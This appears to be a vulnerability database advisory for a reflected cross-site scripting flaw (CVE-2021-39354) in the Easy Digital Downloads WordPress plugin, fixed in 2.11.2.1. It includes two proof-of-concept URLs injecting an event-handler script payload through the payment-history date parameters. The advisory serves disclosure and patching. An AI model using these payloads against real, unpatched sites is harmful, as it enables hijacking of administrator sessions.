Easy Digital Downloads < 2.11.2.1 – Reflected Cross-Site Scripting | CVE 2021-39354 | Plugin Vulnerabilities

Description

The plugin does not escape the start-date and end-date parameters in the payment history dashboard before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&start-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&end-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

easy-digital-downloads

Fixed in 2.11.2.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2616149/

URL

https://github.com/awesomemotive/easy-digital-downloads/releases/tag/2.11.2.1

URL

https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39354

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Thinkland Security Team

Verified

Yes

WPVDB ID

21f5823e-0245-4353-8d4d-2f63b8912b40

Timeline

Publicly Published

2021-10-19 (about 4 years ago)

Added

2021-10-19 (about 4 years ago)

Last Updated

2022-04-14 (about 3 years ago)

Other

Published

Title

Published

2023-12-29

Title

Auto Amazon Links < 5.1.2 - Contributor+ Stored XSS

Published

2025-04-24

Title

WP Customize Login Page <= 1.6.5 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-03-07

Title

SlingBlocks – Gutenberg Blocks by FunnelKit (Formerly WooFunnels) < 1.6.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2005-06-30

Title

WordPress <= 1.5.1.2 - Multiple Cross-Site Scripting (XSS)

Published

2024-06-03

Title

Slider Revolution < 6.7.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via Elementor wrapperid and zindex